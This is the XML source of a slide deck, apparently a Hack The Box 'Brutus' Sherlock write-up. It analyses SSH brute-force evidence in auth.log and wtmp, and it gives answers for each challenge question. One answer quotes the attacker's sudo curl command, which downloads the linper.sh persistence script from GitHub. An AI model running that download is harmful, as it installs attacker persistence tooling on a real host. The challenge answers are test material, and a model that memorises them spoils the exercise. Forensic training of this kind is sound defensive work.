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7" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="258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91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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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467141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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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17669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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F58}" type="slidenum">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL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139061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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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6994954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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F58}" type="slidenum">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IL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242890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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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9493531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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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584061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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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7354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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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468100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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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250860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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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438268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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en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B01BD-F487-49C8-8C78-6E75B2C86F5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636740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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024</a:t>
            </a:fld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B01BD-F487-49C8-8C78-6E75B2C86F5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184412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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en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B01BD-F487-49C8-8C78-6E75B2C86F5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391239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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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054012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E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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B01BD-F487-49C8-8C78-6E75B2C86F5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28409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7E3062-BB6D-402D-B60C-D80FF91740EC}" type="datetimeFigureOut">
              <a:rPr lang="en-IL" smtClean="0"/>
              <a:t>19/07/2024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2AB01BD-F487-49C8-8C78-6E75B2C86F5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78584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8" r:id="rId1"/>
    <p:sldLayoutId id="2147483889" r:id="rId2"/>
    <p:sldLayoutId id="2147483890" r:id="rId3"/>
    <p:sldLayoutId id="2147483891" r:id="rId4"/>
    <p:sldLayoutId id="2147483892" r:id="rId5"/>
    <p:sldLayoutId id="2147483893" r:id="rId6"/>
    <p:sldLayoutId id="2147483894" r:id="rId7"/>
    <p:sldLayoutId id="2147483895" r:id="rId8"/>
    <p:sldLayoutId id="2147483896" r:id="rId9"/>
    <p:sldLayoutId id="2147483897" r:id="rId10"/>
    <p:sldLayoutId id="2147483898" r:id="rId11"/>
    <p:sldLayoutId id="2147483899" r:id="rId12"/>
    <p:sldLayoutId id="2147483900" r:id="rId13"/>
    <p:sldLayoutId id="2147483901" r:id="rId14"/>
    <p:sldLayoutId id="2147483902" r:id="rId15"/>
    <p:sldLayoutId id="214748390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B436E-86F5-5322-6F49-F01DBB17CE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8649" y="3070455"/>
            <a:ext cx="7766936" cy="1646302"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTB sherlocks- Brutus</a:t>
            </a:r>
            <a:endParaRPr lang="en-I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147635-9499-0046-C620-972587022C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8649" y="4523365"/>
            <a:ext cx="7766936" cy="1096899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write up by Chanan shenker</a:t>
            </a:r>
            <a:endParaRPr lang="en-I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43994C-7DF8-7840-CC82-81EFDEB50F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0990" y="1647576"/>
            <a:ext cx="3134162" cy="1781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0853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469388-BFAF-C510-0145-0D968DCAA9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626165"/>
            <a:ext cx="8596668" cy="5536096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>Question 7: How long did the attacker's first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First we already know when the session started from Question 3 “2024-03-06 06:32:45”. Now we just have to find when he logged out.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There it is. The user logged out of the user root at ’06:37:24’. A quick calculation and we get 279 seconds.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Answer 7:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   279</a:t>
            </a:r>
            <a:endParaRPr lang="en-IL" u="sn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49F1E8-37E1-014D-4CF0-FF165557DF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2501263"/>
            <a:ext cx="9002381" cy="1219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7763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0F9921-9CB5-4416-8DD3-36D62EFF26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536713"/>
            <a:ext cx="8596668" cy="5764696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>Question 8: The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lastly I looked at and saw that the attacker, from the same IP address, logged in with the user he added ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cyberjunkie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ and run the curl command to pull a file. Curl is a command that can download file and webpages for you.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As you can see by what highlighted he used curl to pull a file from ‘raw.githubusercontent.com’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Answer 8: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>/usr/bin/curlhttps://raw.githubusercontent.com/montysecurity/li</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>nper/main/linper.sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-IL" u="sn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DB0595-C5E1-6C35-9F42-FBC3BC58EC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23" y="2733578"/>
            <a:ext cx="11850754" cy="695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6555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86102ED-21CC-23DA-A8F7-4EFE4D3E21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3392" y="1041021"/>
            <a:ext cx="6402838" cy="4405623"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4071923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96A39B-7D92-547A-4CBB-942CBB11ED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546651"/>
            <a:ext cx="8596668" cy="5814391"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>Start: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2000" u="sng" dirty="0"/>
              <a:t>Question 1: Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The auth.log is a file that hold all the information involving authorization on the machine, mainly login attempts and other system command that use high privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From my previous interactions with an auth.log file I remembered that all failed login attempts are written with capital F ‘Failed’, with some text manipulation I found only one IP address with failed login attempts.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A4A5BD-4AF7-B964-CDA5-4B15D8A3D7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603" y="1177041"/>
            <a:ext cx="5572903" cy="180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480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657AFB-FD91-2065-5247-39D1C6824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725557"/>
            <a:ext cx="8596668" cy="5315805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u="sng" dirty="0"/>
              <a:t>Answer 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   65.2.161.68</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>Question 2: The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The same as the first question I remembered that attempts to login with valid credentials are written with a capital A ‘Accepted’, so searched for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from the first question and the word ‘Accepted’.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" u="sng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31ED3B-2C89-9B44-5102-CCD9BE1CCA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457" y="725557"/>
            <a:ext cx="5506218" cy="73352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DCFFBC4-87FA-E7A8-F6E0-04D2E59F2C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4100337"/>
            <a:ext cx="9834563" cy="958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606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B90A0-D20B-82B4-AC53-EF443E2FDD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58417"/>
            <a:ext cx="8596668" cy="604299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As we see here the first connection was for the user ‘root’, but just to be sure I looked for the multiple failed login before top be sure it’s the correct user.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As you can see here the multiple failed logins.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Answer 2:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0"/>
              <a:t>Question 3: Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Initially I looked at the auth.log file al looked for the first time it said session opened.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B4F9EFD-BA94-1B97-55C8-EC8528AFD4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459430"/>
            <a:ext cx="8659433" cy="2448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94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B0DA49-959E-7EF7-3A3C-49E7DD74B0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536713"/>
            <a:ext cx="8596668" cy="5474832"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Opkdsa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But if you take a look right after the open session its says the session was closed. Meaning that the hacker did nothing. So I looked more. And found a time were it said open session without an immediate disconnect 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 found this part but for some reason it was still a wrong answer.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E4DF54-E9E5-A6F2-3150-1810379EFE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536713"/>
            <a:ext cx="9383434" cy="199100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8253B52-7F06-0AC7-3D3E-9933FFD5A9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386" y="3552493"/>
            <a:ext cx="9707330" cy="180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711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97FAE1-35B0-5760-30C0-7D940DCDC7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566531"/>
            <a:ext cx="8596668" cy="5474832"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So I decided to take a look at what else we were given. A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wtmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wtmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file is another file that keeps track all logons and logoffs from the machine, and a little search led me to find the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>utmpdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ command that knows how to take </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wtmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file and parse them.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And there it is the connection I've been looking for, with the relevant IP and user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Answer 3:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   2024-03-06 06:32:45</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sn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FFBD12-FDE7-77AD-AB96-47153BC1FC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2014245"/>
            <a:ext cx="9945488" cy="1219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2055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3E0D96-CC2C-BEC2-BFF7-DC11CF5BAD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695739"/>
            <a:ext cx="8596668" cy="5345623"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>Question 4: SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker's session for the user account from Question 2?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In one of the screenshots from the previous question we see that the session  number given to mentioned session is 37.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u="sng" dirty="0"/>
              <a:t>Answer 4:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   37</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IL" sz="2000" u="sn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B97B6F8-7773-D042-8BA6-F5A49BA1FB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2528762"/>
            <a:ext cx="9707330" cy="180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437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49496D-8610-C97B-1E1C-BFE33584B7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536713"/>
            <a:ext cx="8596668" cy="5504649"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" u="sng" dirty="0"/>
              <a:t>Question 5: The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The logs in the auth.log file are built in such a manner ‘&lt;date and time&gt; &lt;category&gt; &lt;info&gt;’. And I know that one of the categories is ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>useradd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ which as it sound is logs that are entered when a new user is being made. So I looked for exactly that.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Viola! The attacker added  a user ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cyberjunkie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alsoyou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can see he added the user to the ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ users which means </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> user will have higher permissions. </a:t>
            </a:r>
            <a:endParaRPr lang="en-I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237F23-A653-412C-F8CC-49FB93ABAB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776" y="2843894"/>
            <a:ext cx="11430448" cy="2085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6059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C4FB81-3074-813D-4046-D290CA6A4E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606287"/>
            <a:ext cx="8596668" cy="5435075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Answer 5:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cyberjunkie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0"/>
              <a:t>Question 6: What is the MITRE ATT&amp;CK sub-technique ID used for persistence?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A quick look on the internet led me to find a page by ‘MITRE’ about persistence techniques. And scrolling a bit I found this.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 persistence method that involves adding a new local user to the  compromised machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Answer 6:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   T1136.001</a:t>
            </a:r>
            <a:endParaRPr lang="en-IL" u="sn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BD81CF-C8FF-BA58-FA51-469D90D706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67" y="2421777"/>
            <a:ext cx="11514666" cy="2014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6112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1030</TotalTime>
  <Words>880</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>92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Trebuchet MS</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Facet</vt:lpstr>
      <vt:lpstr>HTB sherlocks- Brutus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chanashka shenker</dc:creator>
  <cp:lastModifiedBy>chanashka shenker</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-19T16:12:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-20T09:22:53Z</dcterms:modified>
</cp:coreProperties>
</file>